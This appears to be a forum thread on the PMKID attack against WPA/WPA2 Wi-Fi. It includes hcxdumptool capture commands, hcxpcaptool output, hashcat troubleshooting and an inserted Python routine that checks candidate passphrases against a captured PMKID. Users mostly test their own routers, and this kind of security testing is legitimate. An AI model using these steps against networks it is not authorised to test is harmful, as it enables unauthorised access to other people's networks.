New attack on WPA/WPA2 using PMKID
(10-13-2018, 01:03 PM)pineapplepride Wrote: Hi everyone,

I've tried doing this and when I enter

hcxdumptool -o test.pcapng -i wlan0 --enable_status=3

I get

interface is not up
failed to init socket

Can anyone help me with this error please?
I'm using an ALFA AWUS036ACH, up and in monitor mode, and I'm on Kali.
I used:
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
to get it into monitor mode.
Any help is greatly appreciated.
If more information is needed I'll post again
Thanks in advance!


Before monitor mode:

Code:
systemctl stop wpa_supplicant.service

systemctl stop network-manager.service


Then

Code:
ip link set wlan0 down
iw dev wlan0 set type monitor
ip link set wlan0 up
(10-13-2018, 01:03 PM)pineapplepride Wrote: Hi everyone,

Update: Thanks, that helped. I'm also running it with a filter list of 1 MAC address right now, if that matters.
So I got it to run, but it only says "PROBEREQUEST" and "PROBERESPONSE" (never "AUTHENTICATION" or "ASSOCIATIONREQUEST"), and of course never "FOUND PMKID".
Do you know what this could mean?
I tried it on 3 APs so far; should I try more?
Thank you again, I'm really grateful.
I got the PMKID now. Thanks again.
It doesn't work, I tried it against 2 wireless routers.
I did get it to work, I had the mask wrong.
Hey, super exciting post.. but I just tested this against three APs to which I know the password. I made a very small word list that contained those passwords and each time hashcat exhausted and yielded 0 recoveries. I am with @Rit here.. doesn't seem to work.. I don't know if I am missing something.. I wait of course until hcxdumptool yields a PMKID FOUND! running a command like so:

`hcxdumptool -i wlan1mon --filterlist=homewifi.txt --filtermode=2 --enable_status=3 -c 1 -o clownhouse.pcapng `

(which takes a while! I'd almost rather do a de-auth / capture 4way attack)

where homewifi.txt has my router's MAC address minus the ":"

I then ran:
```
hcxpcaptool -z hc_ready_clownhouse clownhouse.pcapng

summary:
--------
file name....................: clownhouse.pcapng
file type....................: pcapng 1.0
file hardware information....: x86_64
file os information..........: Linux 4.18.0-kali1-amd64
file application information.: hcxdumptool 4.2.1
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: little endian
read errors..................: flawless
packets inside...............: 81
skipped packets..............: 0
packets with GPS data........: 0
packets with FCS.............: 0
beacons (with ESSID inside)..: 12
probe requests...............: 7
probe responses..............: 3
association responses........: 1
reassociation responses......: 1
authentications (OPEN SYSTEM): 1
authentications (BROADCOM)...: 1
EAPOL packets................: 52
EAPOL PMKIDs.................: 1
```

Anything I'm missing? Or does it just not work? Maybe I'm late to the game and it's already patched on all three routers? Doubt that.
If there is an algorithm for the handshake, and another for the PMKID, and the common denominator is the password, can't the handshake and the PMKID be used to reveal the PW?
(10-27-2018, 05:04 PM)elidell Wrote: Hey, super exciting post.. but I just tested this against three APs to which I know the password. I made a very small word list that contained those passwords and each time hashcat exhausted and yielded 0 recoveries. I am with @Rit here.. doesn't seem to work.. I don't know if I am missing something.. I wait of course until hcxdumptool yields a PMKID FOUND! running a command like so:
Looks to me that you only ran hcxpcaptool and not Hashcat. hcxpcaptool converts the PMKID to a file that hashcat can work on.
(10-27-2018, 06:20 PM)Rit Wrote: If there is an algorithm for the handshake, and another for the PMKID, and the common denominator is the password, can't the handshake and the PMKID be used to reveal the PW?

Both can be decrypted with hashcat. Whether you are obtaining a handshake via a de-auth of a client to create a hccapx attack or capturing a PMKID clientless, they both yield the same result, just in different formats.

@elidell - Rit is correct in that you have created the proper hash to be run with hashcat. Now you need to create your attack and load your hash to find the password.
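The "common denominator is the password" point above, as an added illustration that is not code from this thread or from the hcx/hashcat projects: the PMKID check that hashcat's mode 16800 performs, reimplemented in Python. The passphrase "Password123" and ESSID "clownhouse" come from elidell's posts; the two MAC addresses and the record itself are constructed for the demo. It also makes the spelling issue concrete: a candidate that differs by one character derives a different PMK and so a different PMKID.

```python
import hashlib
import hmac


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 rounds, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || MAC_AP || MAC_STA), i.e. the first 16 tag bytes."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def parse_16800(line: str):
    """Split one hcxpcaptool -z record: PMKID*MAC_AP*MAC_STA*ESSID(hex)."""
    fields = line.strip().split("*")
    if len(fields) != 4:
        raise ValueError("expected 4 '*'-separated fields")
    pmkid_hex, ap_hex, sta_hex, essid_hex = fields
    return (bytes.fromhex(pmkid_hex), bytes.fromhex(ap_hex),
            bytes.fromhex(sta_hex), bytes.fromhex(essid_hex).decode())


def find_match(line: str, candidates):
    """Return the first candidate whose derived PMKID equals the captured one, else None."""
    captured, ap_mac, sta_mac, essid = parse_16800(line)
    for cand in candidates:
        derived = pmkid(wpa_pmk(cand, essid), ap_mac, sta_mac)
        if hmac.compare_digest(derived, captured):
            return cand
    return None


def build_record(passphrase: str, essid: str, ap_hex: str, sta_hex: str) -> str:
    """Build a record in hcxpcaptool -z format (constructed for the demo, not a real capture)."""
    tag = pmkid(wpa_pmk(passphrase, essid), bytes.fromhex(ap_hex), bytes.fromhex(sta_hex))
    return "*".join([tag.hex(), ap_hex, sta_hex, essid.encode().hex()])


# Constructed sample: locally administered MACs, passphrase and ESSID from the thread.
SAMPLE_LINE = build_record("Password123", "clownhouse", "021122334455", "02aabbccddee")

if __name__ == "__main__":
    # Only the exactly spelled candidate matches; "password123" does not.
    print(find_match(SAMPLE_LINE, ["password123", "Passw0rd123", "Password123"]))
```

The PBKDF2 step is what makes each candidate cost 4096 HMAC-SHA1 iterations, which is why the only defence that matters here is a passphrase that no word list or mask will reach.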
(10-23-2018, 11:07 PM)Rit Wrote: It doesn't work, I tried it against 2 wireless routers.
I did get it to work, I had the mask wrong.

(10-27-2018, 06:31 PM)Rit Wrote: Looks to me that you only ran hcxpcaptool and not Hashcat. hcxpcaptool converts the PMKID to a file that hashcat can work on.

LOL, no, I just didn't post the hashcat results. I assure you I put it through hashcat. I made a simple word list that had 4 passwords including the one used by clownhouse, "Password123". Turns out though I didn't actually spell it correctly in my dummy word list.